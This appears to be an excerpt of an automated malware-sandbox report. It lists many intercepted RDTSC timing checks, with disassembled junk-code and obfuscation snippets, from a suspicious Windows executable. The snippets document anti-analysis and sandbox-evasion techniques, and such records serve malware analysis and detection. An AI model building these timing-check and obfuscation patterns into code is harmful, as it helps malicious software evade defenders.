Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AE3797 second address: AE37A1 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0738B194D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AE37A1 second address: AE37B3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0738AFBE58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AE37B3 second address: AE37B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AE37B7 second address: AE37C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F0738AFBE56h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AE47AE second address: AE47B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AE398A second address: AE398E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AE47B9 second address: AE47BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AE398E second address: AE3994 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AE47BD second address: AE4846 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0738B194D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F0738B194D8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push ebp 0x0000002b call 00007F0738B194D8h 0x00000030 pop ebp 0x00000031 mov dword ptr [esp+04h], ebp 0x00000035 add dword ptr [esp+04h], 00000018h 0x0000003d inc ebp 0x0000003e push ebp 0x0000003f ret 0x00000040 pop ebp 0x00000041 ret 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push ecx 0x00000047 call 00007F0738B194D8h 0x0000004c pop ecx 0x0000004d mov dword ptr [esp+04h], ecx 0x00000051 add dword ptr [esp+04h], 00000015h 0x00000059 inc ecx 0x0000005a push ecx 0x0000005b ret 0x0000005c pop ecx 0x0000005d ret 0x0000005e jl 00007F0738B194E3h 0x00000064 jmp 00007F0738B194DDh 0x00000069 xchg eax, esi 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e jnc 00007F0738B194D6h 0x00000074 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AE3994 second address: AE3999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AE4846 second address: AE484C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AE484C second address: AE4852 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AE5903 second address: AE5964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0738B194E3h 0x00000009 popad 0x0000000a pop ecx 0x0000000b mov dword ptr [esp], eax 0x0000000e add di, 4594h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F0738B194D8h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f movzx ebx, si 0x00000032 push 00000000h 0x00000034 pushad 0x00000035 mov dword ptr [ebp+1244D249h], edx 0x0000003b mov ah, A7h 0x0000003d popad 0x0000003e xchg eax, esi 0x0000003f pushad 0x00000040 jbe 00007F0738B194DCh 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AE5964 second address: AE5983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 jmp 00007F0738AFBE63h 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AE5983 second address: AE598C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AE9B07 second address: AE9B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F0738AFBE58h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 push 00000000h 0x00000025 movsx edi, cx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d call 00007F0738AFBE58h 0x00000032 pop ebx 0x00000033 mov dword ptr [esp+04h], ebx 0x00000037 add dword ptr [esp+04h], 0000001Ah 0x0000003f inc ebx 0x00000040 push ebx 0x00000041 ret 0x00000042 pop ebx 0x00000043 ret 0x00000044 mov bl, 3Eh 0x00000046 xchg eax, esi 0x00000047 pushad 0x00000048 pushad 0x00000049 push edx 0x0000004a pop edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AE9B5E second address: AE9B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F0738B194D6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AEAA43 second address: AEAA47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AE6B69 second address: AE6B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AE6B6D second address: AE6B8F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0738AFBE56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push edi 0x0000000e jmp 00007F0738AFBE5Bh 0x00000013 pop edi 0x00000014 jc 00007F0738AFBE5Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AE9D79 second address: AE9D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F0738B194DCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AEBAD0 second address: AEBAED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AEBAED second address: AEBAF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AEAC85 second address: AEAC9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AEBAF1 second address: AEBB09 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0738B194D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jne 00007F0738B194D6h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AEAC9C second address: AEACAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0738AFBE5Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AEBB09 second address: AEBB8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0738B194E3h 0x00000008 jmp 00007F0738B194E8h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F0738B194D8h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b add dword ptr [ebp+122D29E3h], edi 0x00000031 push 00000000h 0x00000033 clc 0x00000034 push 00000000h 0x00000036 mov ebx, dword ptr [ebp+1244C9CBh] 0x0000003c xchg eax, esi 0x0000003d jmp 00007F0738B194E1h 0x00000042 push eax 0x00000043 pushad 0x00000044 jng 00007F0738B194DCh 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AEBB8E second address: AEBB92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AEDEB4 second address: AEDEE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738B194E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 jmp 00007F0738B194E4h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AF0CFC second address: AF0D2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d jmp 00007F0738AFBE5Dh 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AF5FD4 second address: AF5FF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738B194DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F0738B194DCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AF5FF2 second address: AF6010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F0738AFBE68h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AF6010 second address: AF6014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AF6014 second address: AF601C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AF56C0 second address: AF56D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0738B194E0h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AF939D second address: AF93A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: A97EA2 second address: A97EAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: A97EAF second address: A97EB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: A97EB3 second address: A97ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007F0738B194E7h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: A97ED2 second address: A97EEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE67h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AFF5F6 second address: AFF610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0738B194E0h 0x00000009 jnl 00007F0738B194D6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AFF610 second address: AFF61E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F0738AFBE56h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AFF8C2 second address: AFF8C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AFF8C6 second address: AFF8CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AFF8CD second address: AFF8E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0738B194DCh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AFFA46 second address: AFFA4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AFFA4C second address: AFFA54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AFFD9A second address: AFFDBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE68h 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F0738AFBE56h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AFFF5A second address: AFFF5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B05AA9 second address: B05AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0738AFBE5Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B047C1 second address: B04804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0738B194D6h 0x0000000a popad 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e push edi 0x0000000f pop edi 0x00000010 jo 00007F0738B194D6h 0x00000016 pop esi 0x00000017 push esi 0x00000018 jmp 00007F0738B194DDh 0x0000001d jmp 00007F0738B194E9h 0x00000022 pop esi 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B04804 second address: B04818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0738AFBE60h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B04818 second address: B0481C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B04967 second address: B04989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0738AFBE69h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B04989 second address: B049AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0738B194E1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jno 00007F0738B194D6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B044DE second address: B044E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B044E2 second address: B044F1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jc 00007F0738B194D6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B051E2 second address: B051E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B051E7 second address: B051FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0738B194D6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B051FA second address: B05238 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F0738AFBE64h 0x00000010 jns 00007F0738AFBE56h 0x00000016 popad 0x00000017 js 00007F0738AFBE68h 0x0000001d jmp 00007F0738AFBE62h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: A913E8 second address: A913FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 pop eax 0x00000009 jg 00007F0738B194D6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ADBA05 second address: ADBA1C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jo 00007F0738AFBE56h 0x0000000d pop edx 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ADBA1C second address: ADBA4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jo 00007F0738B194E5h 0x00000010 pushad 0x00000011 jmp 00007F0738B194DBh 0x00000016 push esi 0x00000017 pop esi 0x00000018 popad 0x00000019 pop eax 0x0000001a mov dword ptr [ebp+122D2C6Ah], esi 0x00000020 push BE79C39Fh 0x00000025 pushad 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ADBA4B second address: ADBA6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0738AFBE67h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ADBCB1 second address: ADBCB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ADBCB5 second address: ADBCCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ADBEF3 second address: ADBEF9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ADBEF9 second address: ADBF75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0738AFBE5Ch 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F0738AFBE58h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a ja 00007F0738AFBE59h 0x00000030 push 00000004h 0x00000032 adc ecx, 490CB917h 0x00000038 nop 0x00000039 push ebx 0x0000003a jmp 00007F0738AFBE5Ah 0x0000003f pop ebx 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jo 00007F0738AFBE5Ch 0x00000049 js 00007F0738AFBE56h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ADC31A second address: ADC31F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ADC31F second address: ADC331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnp 00007F0738AFBE64h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ADC331 second address: ADC335 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ADC335 second address: ADC3B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F0738AFBE58h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 mov dword ptr [ebp+1244868Bh], edi 0x00000027 push 0000001Eh 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007F0738AFBE58h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 00000014h 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 mov cl, 24h 0x00000045 nop 0x00000046 jmp 00007F0738AFBE69h 0x0000004b push eax 0x0000004c pushad 0x0000004d jno 00007F0738AFBE5Ch 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ADC3B0 second address: ADC3B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ADC3B4 second address: ADC3B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ADC794 second address: ADC798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
